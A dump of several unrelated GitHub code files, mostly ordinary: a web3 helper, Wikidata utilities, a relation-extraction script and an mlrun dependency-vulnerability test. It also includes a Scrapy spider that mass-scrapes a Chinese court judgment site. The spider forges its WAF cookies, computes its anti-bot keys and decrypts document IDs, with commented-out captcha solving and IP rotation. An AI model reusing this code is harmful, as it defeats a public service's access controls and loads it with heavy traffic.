sensors))\n","repo_name":"brohrer/robot-training-game","sub_path":"world/v03.py","file_name":"v03.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"3130781873","text":"import json\nfrom typing import Callable\n\nfrom eth_account.signers.local import (\n LocalAccount,\n)\nfrom web3 import Web3, HTTPProvider\n\nfrom scripts_py.libs.accounts import AccountsHandler\n\n\nclass W3Obj:\n\n def __init__(self, url: str = \"http://localhost:8545\", *args, **kwargs):\n self.w3 = Web3(HTTPProvider(url))\n self.accounts_handler = AccountsHandler()\n self.set_signer(self.accounts_handler.accounts[0])\n print(\"Connected? \", self.w3.isConnected())\n\n def get_w3(self) -> Web3:\n return self.w3\n\n def get_eoa(self, key: str) -> LocalAccount:\n if not self.accounts_handler.check_pk(key):\n raise ValueError(f\"{key} does not exist\")\n eoa = self.w3.eth.account.privateKeyToAccount(key)\n return eoa\n\n def set_signer(self, key):\n eoa = self.get_eoa(key)\n self.signer = eoa\n\n def _get_nonce(self, signer):\n return self.w3.eth.get_transaction_count(signer.address)\n\n def send_transaction(self, function: Callable, tx_kwargs: list, signer=None):\n signer = signer or self.signer\n try:\n tx = function(*tx_kwargs).buildTransaction({\n 'from': signer.address,\n 'gas': 30000000,\n 'maxFeePerGas': self.w3.toWei('2', 'gwei'),\n 'maxPriorityFeePerGas': self.w3.toWei('1', 'gwei'),\n 'nonce': self._get_nonce(signer),\n })\n signed_tx = signer.sign_transaction(tx)\n tx_hash = self.w3.eth.send_raw_transaction(signed_tx.rawTransaction)\n tx_receipt = self.w3.eth.wait_for_transaction_receipt(tx_hash)\n return tx_receipt\n except Exception as e:\n try:\n print(\"Error:\", e.args[0][\"data\"][\"message\"])\n except:\n print(\"Error: \", str(e))\n return None\n\n\n\n\n","repo_name":"ReadMost/voyage_rauan_hw","sub_path":"scripts_py/libs/w3_basic.py","file_name":"w3_basic.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35325949965","text":"import re\nimport json\n\nENTITY_PATTERN = re.compile('Q[0-9]+')\nPREDICATE_PATTERN = re.compile('P[0-9]+')\n\nwith open(\"../data/labels_dict.json\") as labelFile:\n labels_dict = json.load(labelFile)\n\ndef is_timestamp(timestamp):\n pattern = re.compile('^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]T00:00:00Z')\n if not(pattern.match(timestamp)):\n return False\n else:\n return True\n\n\ndef convertTimestamp(timestamp):\n yearPattern = re.compile('^[0-9][0-9][0-9][0-9]-00-00T00:00:00Z')\n monthPattern = re.compile('^[0-9][0-9][0-9][0-9]-[0-9][0-9]-00T00:00:00Z')\n dayPattern = re.compile('^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]T00:00:00Z')\n timesplits = timestamp.split(\"-\")\n year = timesplits[0]\n if yearPattern.match(timestamp):\n return year\n month = convertMonth(timesplits[1])\n if monthPattern.match(timestamp):\n return month + \" \" + year\n elif dayPattern.match(timestamp):\n day = timesplits[2].rsplit(\"T\")[0]\n return day + \" \" + month + \" \" + year\n\n return timestamp\n\ndef convertMonth(month):\n return{\n \"01\": \"january\",\n \"02\": \"february\",\n \"03\": \"march\",\n \"04\": \"april\",\n \"05\": \"may\",\n \"06\": \"june\",\n \"07\": \"july\",\n \"08\": \"august\",\n \"09\": \"september\",\n \"10\": \"october\",\n \"11\": \"november\",\n \"12\": \"december\"\n }[month]\n\n\ndef get_label(entity):\n label = \"\"\n if entity.startswith(\"Q\") or entity.startswith(\"P\"):\n #for predicates: P10-23, split away counting\n if \"-\" in entity:\n e = entity.split(\"-\") [0]\n else:\n e = entity\n if e in labels_dict.keys():\n label = labels_dict[e]\n else:\n if is_timestamp(entity):\n label = convertTimestamp(entity)\n elif entity.startswith(\"+\"):\n label = entity.split(\"+\")[1]\n else:\n label = entity\n\n return label\n\n\ndef fill_missing_prefixes(prefixes, sparql):\n new_sparql = sparql\n for alias, uri in prefixes.items():\n if sparql.find(alias) != -1 and sparql.find(uri) == -1:\n new_sparql = uri + \" \" + new_sparql\n return new_sparql\n\n# if __name__ == '__main__':\n# sparql = \"SELECT ?obj WHERE { wd:Q567 p:P39 ?s . ?s ps:P39 ?obj . ?s pq:P580 ?x filter(contains(YEAR(?x),'1994')) }\"\n# PREFIXES_WIKIDATA = {\n# \" p:\": \"PREFIX p: \",\n# \"wdt:\": \"PREFIX wdt: \",\n# \"wd:\": \"PREFIX wd: \",\n# \"xsd:\": \"PREFIX xsd: \",\n# \"pq:\": \"PREFIX pq: \",\n# \"ps:\": \"PREFIX ps: \",\n# \"rdfs:\": \"PREFIX rdfs: \"\n# }\n# print(fill_missing_prefixes(PREFIXES_WIKIDATA, sparql))","repo_name":"semantic-systems/seq2sparql-rl","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20691400395","text":"import torch \nimport numpy as np\nimport json\nfrom bert_seq2seq import Tokenizer, load_chinese_base_vocab\nfrom bert_seq2seq import load_bert\n\n\npredicate2id, id2predicate = {}, {}\nwith open('../state_dict/all_50_schemas', encoding=\"utf-8\") as f:\n for l in f:\n l = json.loads(l)\n if l['predicate'] not in predicate2id:\n id2predicate[len(predicate2id)] = l['predicate']\n predicate2id[l['predicate']] = len(predicate2id)\n\ndef search(pattern, sequence):\n \"\"\"从sequence中寻找子串pattern\n 如果找到,返回第一个下标;否则返回-1。\n \"\"\"\n n = len(pattern)\n for i in range(len(sequence)):\n if sequence[i:i + n] == pattern:\n return i\n return -1\n\ndef search_subject(token_ids, subject_labels, idx2word):\n # subject_labels: (lens, 2)\n if type(subject_labels) is torch.Tensor:\n subject_labels = subject_labels.numpy()\n if type(token_ids) is torch.Tensor:\n token_ids = token_ids.cpu().numpy()\n subjects = []\n subject_ids = []\n start = -1\n end = -1\n for i in range(len(token_ids)):\n if subject_labels[i, 0] > 0.5:\n start = i\n for j in range(len(token_ids)):\n if subject_labels[j, 1] > 0.5:\n subject_labels[j, 1] = 0\n end = j\n break\n if start == -1 or end == -1:\n continue\n subject = \"\"\n for k in range(start, end + 1):\n subject += idx2word[token_ids[k]]\n # print(subject)\n subject_ids.append([start, end])\n start = -1\n end = -1\n subjects.append(subject)\n\n return subjects, subject_ids\n\ndef search_object(token_ids, object_labels, idx2word):\n objects = []\n if type(object_labels) is torch.Tensor:\n object_labels = object_labels.numpy()\n if type(token_ids) is torch.Tensor:\n token_ids = token_ids.cpu().numpy()\n start = np.where(object_labels[:, :, 0] > 0.5)\n end = np.where(object_labels[:, :, 1] > 0.5)\n for _start, predicate1 in zip(*start):\n for _end, predicate2 in zip(*end):\n if _start <= _end and predicate1 == predicate2:\n object_text = \"\"\n for k in range(_start, _end + 1):\n # print(token_ids(k))\n object_text += idx2word[token_ids[k]]\n objects.append(\n (id2predicate[predicate1], object_text)\n )\n break \n \n return objects\n\ndef relation_extract(model, text, word2idx, tokenizer, device=\"cpu\"):\n idx2word = {v: k for k , v in word2idx.items()}\n with torch.no_grad():\n token_ids_test, segment_ids = tokenizer.encode(text, max_length=256)\n token_ids_test = torch.tensor(token_ids_test, device=device).view(1, -1)\n # 先预测subject\n pred_subject = model.predict_subject(token_ids_test)\n pred_subject = pred_subject.squeeze(0)\n subject_texts, subject_idss = search_subject(token_ids_test[0], pred_subject.cpu(), idx2word)\n if len(subject_texts) == 0:\n return \"没有预测出任何信息\"\n result_info = \"\"\n for sub_text, sub_ids in zip(subject_texts, subject_idss):\n result_info += \"s is \" + str(sub_text) + \"\\n\"\n sub_ids = torch.tensor(sub_ids, device=device).view(1, -1)\n # print(\"sub_ids shape is \" + str(sub_ids))\n object_p_pred = model.predict_object_predicate(token_ids_test, sub_ids)\n res = search_object(token_ids_test[0], object_p_pred.squeeze(0).cpu(), idx2word)\n result_info += \"p and o is \" + str(res) + \"\\n\"\n return result_info\n\n\n\n\n\n","repo_name":"920232796/NLP_flask","sub_path":"nlp_api/test/relation_extract_test.py","file_name":"relation_extract_test.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"8662664651","text":"import unittest.mock\n\nimport pytest\n\nimport automation.package_test.test\nimport tests.conftest\nfrom mlrun.utils import logger\n\n\ndef test_test_requirements_vulnerabilities():\n package_tester = automation.package_test.test.PackageTester()\n cases = [\n {\n \"output\": \"\"\"\n[\n [\n \"fastapi\",\n \"<0.75.2\",\n \"0.67.0\",\n \"Fastapi 0.75.2 updates its dependency 'ujson' ranges to include a security fix.\",\n \"48159\",\n null,\n null\n ]\n]\"\"\",\n \"expected_to_fail\": True,\n },\n {\n \"output_file\": tests.conftest.tests_root_directory\n / \"automation\"\n / \"package_test\"\n / \"assets\"\n / \"ignored_vulnerabilities.json\",\n },\n {\n \"output\": \"\",\n },\n ]\n for case in cases:\n logger.info(\"Testing case\", case=case)\n\n def _run_command_mock(command, *args, **kwargs):\n # _test_requirements_vulnerabilities flow is running two commands:\n # 1. pip install safety - we don't care about it, so simply return success\n # 2. safety check --json - this is the actual one we want to mock the output for\n if command == \"pip install safety\":\n return 0, \"\", \"\"\n elif command == \"safety check --json\":\n if case.get(\"output_file\"):\n with open(case[\"output_file\"]) as file:\n output = file.readlines()\n output = \"\".join(output)\n else:\n output = case.get(\"output\")\n code = 255 if output else 0\n return code, output, \"\"\n else:\n raise NotImplementedError(f\"Got unexpected command: {command}\")\n\n package_tester._run_command = unittest.mock.Mock(side_effect=_run_command_mock)\n if case.get(\"expected_to_fail\"):\n with pytest.raises(AssertionError, match=\"Found vulnerable requirements\"):\n package_tester._test_requirements_vulnerabilities(\"some-extra\")\n else:\n package_tester._test_requirements_vulnerabilities(\"some-extra\")\n","repo_name":"Hedingber/mlrun","sub_path":"tests/automation/package_test/test_package_test.py","file_name":"test_package_test.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"22228447713","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport uuid\nimport re\nimport json\nimport time\nimport random\nimport calendar\nimport execjs\nimport scrapy\nimport logging\nimport requests\n\nfrom scrapy import signals\nfrom twisted.internet import reactor, defer, task\nfrom twisted.names import client\nfrom twisted.internet import task\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom twisted.web._newclient import ResponseNeverReceived\nfrom twisted.internet.error import DNSLookupError, ConnectionLost, TimeoutError, TCPTimedOutError, ConnectionRefusedError\nfrom scrapy.http import Response, TextResponse\n\nfrom wenshu import jshelper\nfrom wenshu.items import TaskItem, DocItem\nfrom wenshu.exceptions import WafVerifyError, RemindKeyError, RemindError, Vl5xTimeoutError\n\nfrom netifaces import AF_INET\nimport netifaces as ni\n\nlogger = logging.getLogger(__name__)\n\nclass ListSpider(scrapy.Spider):\n\tname = 'list'\n\tallowed_domains = ['court.gov.cn']\n\tcustom_settings = {\n\t\t'CONCURRENT_REQUESTS': 1024,\n\t\t'RETRY_ENABLED': True,\n\t\t'MAX_RETRY_TIMES': 3,\n\t\t'DOWNLOAD_TIMEOUT': 30,\n\t\t'DOWNLOAD_DELAY': 0,\n\t\t'CONCURRENT_REQUESTS_PER_DOMAIN': 256,\n\t\t'CONCURRENT_REQUESTS_PER_IP': 256\n\t}\n\tstart_urls = []\n\n\thandle_httpstatus_all = True\n\n\tHOME_URL = 'http://wenshu.court.gov.cn'\n\tSTART_URL = 'http://wenshu.court.gov.cn/List/List?sorttype=1&conditions=searchWord+2+AJLX++案件类型:民事案件'\n\tLIST_CONTENT_URL = 'http://wenshu.court.gov.cn/List/ListContent'\n\tCODE_URL = 'http://wenshu.court.gov.cn/ValiCode/GetCode'\n\n\tCAPTCHA_URL = 'http://wenshu.court.gov.cn/User/ValidateCode/'\n\tCAPTCHA_VALIDATE_URL = 'http://wenshu.court.gov.cn/Content/CheckVisitCode'\n\n\tCAPTCHA_SOLVE_URL = 'http://localhost:5000/solve'\n\tF80COOKIES_URL = 'http://localhost:3000/f80Cookies'\n\n\tCONCURRENT_SESSIONS_PER_IP = 64\n\n\tWAF_DELAY = 310\n\n\tCHANGE_IP_ENABLED = False\n\n\tSTATS_INTERVAL = 60\n\n\tDEBUG_TASK_IDS = []\n\n\tlast_task = {}\n\n\t# available_proxies = {}\n\t# used_proxies = {}\n\twenshu_servers = ['61.160.224.60']\n\n\tstats = {\n\t\t'start': time.time(),\n\t\t'speed': 0,\n\t\t'total': 0,\n\t\t'_count_queue': [],\n\t\t'_last_scraped_count': {'time': time.time(), 'count': 0}\n\t}\n\n\tdef start_requests(self):\n\t\tself._init_stats_task()\n\n\t\tself.wenshu_servers = self.crawler.settings.get('WENSHU_SERVERS', [])\n\t\tfor request in self.CdnRequests():\n\t\t\tyield request\n\n\tdef CdnRequests(self):\n\t\trequests = []\n\t\tfor i in range(0, len(self.wenshu_servers) if self.wenshu_servers else 1):\n\t\t\tfor count in range(0, self.CONCURRENT_SESSIONS_PER_IP):\n\t\t\t\trequest = self.ListRequest()\n\t\t\t\trequest.meta['delay_request'] = random.random() * self.CONCURRENT_SESSIONS_PER_IP\n\t\t\t\tif self.wenshu_servers:\n\t\t\t\t\trequest.meta['ip_addr'] = self.wenshu_servers[i]\n\t\t\t\trequests.append(request)\n\t\treturn requests\n\n\tdef ListRequest(self):\n\t\tf80s = jshelper.f80sCookie()\n\t\tf80t = jshelper.f80tCookie()\n\t\treturn scrapy.Request(url = self.START_URL, headers = {'Referer': 'http://wenshu.court.gov.cn'}, cookies = {'FSSBBIl1UgzbN7N80T': f80t, 'FSSBBIl1UgzbN7N80S': f80s}, callback = self.parse_list, errback = self.other_error, dont_filter = True, meta = {'dont_delay': True})\n\n\tdef NumberRequest(self):\n\t\tpost_data = {'guid': self.create_guid()}\n\t\treturn scrapy.FormRequest(url = self.CODE_URL, formdata = post_data, headers = {'Referer': 'http://wenshu.court.gov.cn'}, callback = self.parse_number, errback = self.other_error)\n\n\tdef parse(self, response):\n\t\traise Exception('Unkown request!')\n\n\tdef ListContentRequest(self, response, task = None):\n\t\tsession = response.request.meta.get('session', None)\n\n\t\tif task is None:\n\t\t\ttask = self.last_task = self.task_pipeline.next_list_task()\n\n\t\tif not task:\n\t\t\tlogger.info('No more task')\n\t\t\treturn\n\n\t\tpage = task.get('page', 1)\n\t\tpost_data = {\n\t\t\t'Param': self._task_to_post_param(task),\n\t\t\t'Index': str(page if page else 1),\n\t\t\t'Page': \"10\",\n\t\t\t'Order': '法院层级',\n\t\t\t'Direction': 'asc',\n\t\t\t'vl5x': session.get('vl5x', ''),\n\t\t\t'number': session.get('number', ''),\n\t\t\t'guid': self.create_guid()\n\t\t}\n\n\t\tf80s = jshelper.f80sCookie()\n\t\tf80t = jshelper.f80tCookie()\n\n\t\trequest = scrapy.FormRequest(url = self.LIST_CONTENT_URL, formdata = post_data, headers = {'Referer': 'http://wenshu.court.gov.cn'}, cookies = {'FSSBBIl1UgzbN7N80T': f80t, 'FSSBBIl1UgzbN7N80S': f80s}, callback = self.list_request_loop, errback = self.other_error, meta = {'task': task, 'param': post_data})\n\t\tlogger.debug('Processing task: Param:{};Index:{}'.format(post_data['Param'], post_data['Index']))\n\n\t\tif task.get('task_id') == -1:\n\t\t\trequest.meta['delay_request'] = 10\n\t\t\tsession['no_task_sleep_count'] = session.get('no_task_sleep_count', 0) + 1\n\t\t\tif session.get('no_task_sleep_count', 0) > 5:\n\t\t\t\traise scrapy.exceptions.CloseSpider('Finished because no more tasks!')\n\t\t\telse:\n\t\t\t\tlogger.info('Wait 10 secs for new task...')\n\n\t\treturn request\n\n\tdef list_request_loop(self, response):\n\t\ttask = response.request.meta.get('task', None)\n\t\tif len(response.text) == 0: #retry\n\t\t\tlogger.debug('response is empty, retry for task ' + str(task.get('task_id')))\n\t\t\tyield self.ListContentRequest(response, task)\n\t\t\treturn\n\t\ttry:\n\t\t\tjson_string = eval(response.text)\n\t\t\tjson_string = json_string.replace('\\r', '').replace('\\n', '').replace('\\t', '').replace('\\\\\\\",\\\"案件类型\\\"', '\\\",\\\"案件类型\\\"').replace('0\\\"},]', '0\\\"}]')\n\n\t\t\tdata = json.loads(json_string)\n\n\t\t\trunEval = data[0].get('RunEval', '')\n\n\t\t\tdoc_count = int(data[0].get('Count', '0'))\n\t\t\ttask['doc_count'] = doc_count\n\t\t\t\n\t\t\tlogger.debug('Scraped task id = {}, total count: {}'.format(task.get('task_id', 0), doc_count))\n\n\t\t\tdocs = []\n\t\t\tif len(data) > 1:\n\t\t\t\tfor item in data[1:]:\n\t\t\t\t\tdoc = DocItem()\n\t\t\t\t\tdoc_id = item.get('文书ID', '')\n\t\t\t\t\t# doc_id = jshelper.decryptDocID(runEval, doc_id)\n\t\t\t\t\tdoc['doc_id'] = doc_id\n\t\t\t\t\tdoc['status'] = 0\n\t\t\t\t\tdoc['case_name'] = item.get('案件名称', '')\n\t\t\t\t\tdoc['case_no'] = item.get('案号', '')\n\t\t\t\t\tdoc['case_type'] = item.get('案件类型', '')\n\t\t\t\t\tdoc['court_name'] = item.get('法院名称', '')\n\t\t\t\t\tdoc['trial_date'] = item.get('裁判日期', '')\n\t\t\t\t\tdoc['trial_summary'] = item.get('裁判要旨段原文', '')\n\t\t\t\t\tdocs.append(doc)\n\n\t\t\t\tdoc_ids = jshelper.decryptDocIDs(runEval, list(map(lambda doc: doc['doc_id'], docs)))\n\t\t\t\tif not (len(doc_ids) == len(docs)):\n\t\t\t\t\traise Exception('Error: doc_ids length not equals to docs length')\n\t\t\t\tfor i in range(0, len(docs)):\n\t\t\t\t\tdocs[i]['doc_id'] = doc_ids[i]\n\t\t\t\t\t\n\t\t\tif len(docs) > 1:\n\t\t\t\tself.doc_pipeline.save_docs(docs)\n\t\t\t\n\t\t\ttask['fails'] = 0\n\n\t\t\tself.crawler.stats.inc_value('docid_scraped_count', count = len(docs) - 1, spider=self)\n\t\t\t\t\t\n\t\texcept Exception as e:\n\n\t\t\ttask['fails'] = task.get('fails', 0) + 1\n\t\t\tlogger.error('Parse list response error\\n%(error)s\\nrepsone code:%(status)d\\nrequest task:\\n%(task)s\\nrequest param:\\n%(param)s\\nresponse text:\\n%(text)s', {'error': e, 'status': response.status, 'task': task, 'text': response.text, 'param': response.request.meta.get('param')}, exc_info = True, extra = {'response': response})\n\n\t\tfinally:\n\n\t\t\tfails = task.get('fails', 0) > 0\n\t\t\tif fails:\n\t\t\t\ttask['status'] = 0\n\t\t\telif task.get('status', 0) == -1:\n\t\t\t\ttask['status'] = 1\n\n\t\t\tself.task_pipeline.update(task)\n\t\t\tyield self.ListContentRequest(response)\n\n\tdef parse_list(self, response):\n\t\tsession = response.request.meta.get('session', None)\n\t\tcookies = session.get('cookies', None)\n\n\t\tset_cookies = response.headers.getlist('Set-Cookie')\n\t\tif set_cookies and len(set_cookies) > 0:\n\t\t\tfor cookie in set_cookies:\n\t\t\t\tname_value = cookie.decode().split(';')[0].split('=')\n\t\t\t\tif name_value[0] == 'vjkl5':\n\t\t\t\t\tvjkl5 = name_value[1]\n\t\t\t\t\tvl5x = jshelper.getKey(vjkl5)\n\t\t\t\t\tsession['vjkl5'] = vjkl5\n\t\t\t\t\tsession['vl5x'] = vl5x\n\t\t\t\t\tsession['vl5x_time'] = time.time()\n\n\t\tvl5x = session.get('vl5x', None)\n\t\tif vl5x:\n\t\t\tyield self.NumberRequest()\n\t\telse:\n\t\t\tyield self.ListRequest()\n\n\tdef parse_number(self, response):\n\t\tif len(response.text) >= 4 and len(response.text) < 40:\n\t\t\tself.last_number_time = time.time()\n\t\t\tnumber = response.text\n\t\t\tsession = response.request.meta.get('session', None)\n\t\t\tsession['number'] = number\n\t\t\tsession['number_time'] = time.time()\n\t\t\tlogger.debug('Success get code: {}'.format(response.text))\n\t\t\tyield self.ListContentRequest(response)\n\t\telse:\n\t\t\tlogger.debug('Failed get code, retrying...')\n\t\t\tyield self.NumberRequest()\n\n\tdef other_error(self, failure):\n\t\ttask = failure.request.meta.get('task', None)\n\t\tif task:\n\t\t\tif task.get('status', 0) == -1:\n\t\t\t\ttask['status'] = 0\n\t\t\tself.task_pipeline.update(task)\n\n\t\tif not (failure.check(Vl5xTimeoutError) or task):\n\t\t\tlogger.error('%s:%s', repr(failure), failure.request.url)\n\n\t\t#middleware will not handle errback output, so call middleware method here, ref:\n\t\t# FIXME: don't ignore errors in spider middleware, in scraper.py\n\t\trequest = self.ListRequest()\n\t\trequest = self.session_ware.process_output_request(request, failure, self)\n\t\trequest.meta['delay_request'] = 0.5\n\n\t\tif failure.check(TimeoutError, ResponseNeverReceived, ConnectionRefusedError, WafVerifyError):\n\t\t\tlogger.error('%s:%s', repr(failure), failure.request.url)\n\t\t\t# request.meta['delay_request'] = self.WAF_DELAY\n\n\t\tyield request\n\t\n\n\tdef _init_stats_task(self):\n\t\tself.prev_docid_scraped_count = 0\n\t\tself.multiplier = 60.0 / self.STATS_INTERVAL\n\t\tself.stats_task = task.LoopingCall(self._log)\n\t\tself.stats_task.start(self.STATS_INTERVAL)\n\n\tdef _log(self):\n\t\tdocid_scraped_count = self.crawler.stats.get_value('docid_scraped_count', 0)\n\t\tdocrate = (docid_scraped_count - self.prev_docid_scraped_count) * self.multiplier\n\t\tself.prev_docid_scraped_count = docid_scraped_count\n\t\tmsg = 'Last task date: %(year)s-%(month)s-%(day)s, Crawled %(docs)d docs (at %(docrate)d docs/min)'\n\t\tlog_args = {'year': self.last_task.get('year', 0), 'month': self.last_task.get('month', 0), 'day': self.last_task.get('day', 0), 'docs': docid_scraped_count, 'docrate': docrate}\n\t\tlogger.info(msg, log_args)\n\n\t@classmethod\n\tdef from_crawler(cls, crawler, *args, **kwargs):\n\t\tspider = super(ListSpider, cls).from_crawler(crawler, *args, **kwargs)\n\t\tcrawler.signals.connect(spider.spider_closed, signal=signals.spider_closed)\n\t\treturn spider\n\n\tdef spider_closed(self, spider):\n\t\tjshelper.free()\n\n\tdef create_guid(self):\n\t\tc = lambda: format(int((1 + random.random()) * 65536), 'x')[1:]\n\t\treturn c() + c() + '-' + c() + '-' + c() + c() + '-' + c() + c() + c()\n\n\t#Param: 法院层级:基层法院,案件类型:民事案件,审判程序:一审,文书类型:判决书,裁判日期:2018-12-11 TO 2018-12-11,法院地域:北京市\n\tdef _task_to_post_param(self, task):\n\t\tself.TASK_PARAM_KEY_MAP = {\n\t\t\t'trial_date': '裁判日期',\n\t\t\t'court_area': '法院地域',\n\t\t\t'middle_court': '中级法院',\n\t\t\t'basic_court': '基层法院',\n\t\t\t'doc_type': '文书类型',\n\t\t}\n\t\t\n\t\tday = task.get('day', None)\n\t\tmonth = task.get('month', None)\n\t\tyear = task.get('year', None)\n\t\tstart_day = day\n\t\tend_day = day\n\t\tstart_month = month\n\t\tend_month = month\n\n\t\tif day is None:\n\t\t\tstart_day = 1\n\t\t\tif month is None:\n\t\t\t\tstart_month = 1\n\t\t\t\tend_month = 12\n\t\t\t\tend_day = 31\n\t\t\telse:\n\t\t\t\tend_day = calendar.monthrange(year, end_month)[1]\n\n\t\td = {}\n\n\t\tfor key in self.TASK_PARAM_KEY_MAP.keys():\n\t\t\tvalue = task.get(key, None)\n\t\t\tif key == 'trial_date':\n\t\t\t\td[self.TASK_PARAM_KEY_MAP[key]] = '{}-{}-{} TO {}-{}-{}'.format(year, '{:02d}'.format(start_month), '{:02d}'.format(start_day), year, '{:02d}'.format(end_month), '{:02d}'.format(end_day))\n\t\t\telif key == 'court_area' and value == '最高人民法院':\n\t\t\t\td['法院层级'] = '最高法院'\n\t\t\telif value is None:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif len(value) > 0:\n\t\t\t\t\td[self.TASK_PARAM_KEY_MAP[key]] = value\n\n\t\tcourt_level = task.get('court_level', None)\n\t\tif not (court_level is None):\n\t\t\td['法院层级'] = court_level\n\n\t\tparam = []\n\t\tfor key in d.keys():\n\t\t\tparam.append('{}:{}'.format(key, d[key]))\n\n\t\treturn ','.join(param)\n\n\t# def CaptChaRequest(self):\n\t# \treturn scrapy.Request(url = self.CAPTCHA_URL + str(random.randint(1, 9999)), headers = {'Referer': 'http://wenshu.court.gov.cn'}, callback = self.parse_captcha, errback = self.other_error, meta = {'dont_delay': True})\n\n\t# def CaptChaValidateRequest(self, captcha_code):\n\t# \treturn scrapy.FormRequest(url = self.CAPTCHA_VALIDATE_URL, formdata = {'ValidateCode': captcha_code}, headers = {'Referer': 'http://wenshu.court.gov.cn'}, callback = self.parse_captcha_validate, errback = self.other_error, meta = {'dont_delay': True})\n\n\t# def CaptChaSovleRequest(self, prepped):\n\t# \treturn scrapy.Request(url = self.CAPTCHA_SOLVE_URL, method = 'POST', headers = prepped.headers, body = prepped.body, callback = self.parse_captcha_solve, errback = self.other_error, meta = {'dont_delay': True})\n\n\n\t# def parse_captcha(self, response):\n\t# \tif isinstance(response, Response) and response.status == 200:\n\t# \t\tfiles = {'captcha_image': response.body}\n\t# \t\tprepped = requests.Request('POST', self.CAPTCHA_SOLVE_URL, files=files).prepare()\n\t# \t\tyield self.CaptChaSovleRequest(prepped)\n\t# \telse:\n\t# \t\tlogger.info('Failed to get captcha, retrying...')\n\t# \t\tyield self.CaptChaRequest()\n\n\t# def parse_captcha_solve(self, response):\n\t# \tif len(response.text) > 0:\n\t# \t\tyield self.CaptChaValidateRequest(response.text)\n\t# \telse:\n\t# \t\tlogger.error('Not recognize the captcha')\n\t# \t\tyield self.CaptChaRequest()\n\n\t# def parse_captcha_validate(self, response):\n\t# \tif response.text == '1':\n\t# \t\tlogger.info('Success solve captcha!')\n\t# \t\tsession = response.request.meta.get('session', None)\n\t# \t\tyield self.ListRequest()\n\t# \telse:\n\t# \t\tlogger.info('Retry solve captcha...')\n\t# \t\tyield self.CaptChaRequest()\n\n\t# def F80ForListRequest(self):\n\t# \treturn scrapy.Request(url = self.F80COOKIES_URL, callback = self.parse_f80_for_list, errback = self.other_error, meta = {'dont_delay': True})\n\n\t# def F80ForListContentRequest(self):\n\t# \treturn scrapy.Request(url = self.F80COOKIES_URL, callback = self.parse_f80_for_list_content, errback = self.other_error, meta = {'dont_delay': True})\n\n\n\t# def parse_f80_for_list(self, response):\n\t# \tsession = response.request.meta.get('session', None)\n\t# \tf80cookies = json.loads(response.text)\n\t# \tsession['f80s'] = f80cookies['f80s']\n\t# \tsession['f80t'] = f80cookies['f80t']\n\t# \tyield self.ListRequest(response)\n\n\t# def parse_f80_for_list_content(self, response):\n\t# \tsession = response.request.meta.get('session', None)\n\t# \tf80cookies = json.loads(response.text)\n\t# \tsession['f80s'] = f80cookies['f80s']\n\t# \tsession['f80t'] = f80cookies['f80t']\n\t# \tyield self.ListContentRequest(response)\n\n\n\t# def HomeRequest(self):\n\t# \treturn scrapy.Request(url = self.HOME_URL, callback = self.parse_home, errback = self.other_error, dont_filter = True, meta = {'dont_delay': True})\n\n\t# def parse_home(self, response):\n\t# \tsession = response.request.meta.get('session', None)\n\t# \tmeta = response.css('#9DhefwqGPrzGxEp9hPaoag::attr(content)').extract_first()\n\t# \tsession['meta'] = meta\n\n\t# \tywtu = jshelper.getYWTU(meta)\n\t# \tsession['ywtu'] = ywtu\n\n\t# \tset_cookies = response.headers.getlist('Set-Cookie')\n\t# \tif set_cookies and len(set_cookies) > 0:\n\t# \t\tfor cookie in set_cookies:\n\t# \t\t\tname_value = cookie.decode().split(';')[0].split('=')\n\t# \t\t\tif name_value[0] in ['FSSBBIl1UgzbN7N80S', 'FSSBBIl1UgzbN7N80T']:\n\t# \t\t\t\tsession[name_value[0]] = name_value[1]\n\n\t# \t\tyield self.ListRequest(response)\n\n\t# def parse_server_list(self, response):\n\t# \tif isinstance(response, Response) and response.status == 200:\n\t# \t\tprint(response.text)\n\t# \t\tresult = json.loads(response.text)\n\t# \t\tif result and result.get('status', False):\n\t# \t\t\tservers = result.get('data', {})\n\t# \t\t\tself.wenshu_servers = [s.get('ip') for s in servers]\n\t# \t\t\tlogger.debug('Success to get server list: {}'.format(self.wenshu_servers))\n\t# \t\t\treturn self.ListRequests(response)\n\t# \telse:\n\t# \t\tlogger.error('%s:%s', repr(response), response.request.url)\n\n\t# \traise scrapy.exceptions.CloseSpider('Error: can not get wenshu server ips')\n\n\n\t# def change_ip_address(self):\n\t# \tlogger.info('Now will renew pppoe ip addr, please wait...')\n\n\t# \twhile True:\n\t# \t\tlast_ip_addr = ni.ifaddresses('ppp0')[AF_INET][0]['addr']\n\t# \t\tos.system('osascript ' + self.settings.get('PROJECT_ROOT') + '/scripts/renewip.scpt')\n\t# \t\ttime.sleep(0.5)\n\t# \t\tnew_ip_addr = ni.ifaddresses('ppp0')[AF_INET][0]['addr']\n\t# \t\tif new_ip_addr != last_ip_addr:\n\t# \t\t\tbreak\n\t# \tlogger.info('Successed change ip!')\n\n\n\t# def load_available_proxies(self):\n\t# \tproxies = self.proxy_pipline.available_proxies()\n\t# \tfor proxy in proxies:\n\t# \t\tif (not proxy['ip'] in self.available_proxies.keys()) and (not proxy['ip'] in self.used_proxies.keys()):\n\t# \t\t\tself.available_proxies[proxy['ip']] = proxy\n\n\t# def next_available_proxy(self):\n\t# \tfor ip in self.available_proxies.keys():\n\t# \t\tif not ip in self.used_proxies.keys():\n\t# \t\t\tproxy = self.available_proxies.pop(ip)\n\t# \t\t\tself.used_proxies[proxy['ip']] = proxy\n\t# \t\t\treturn 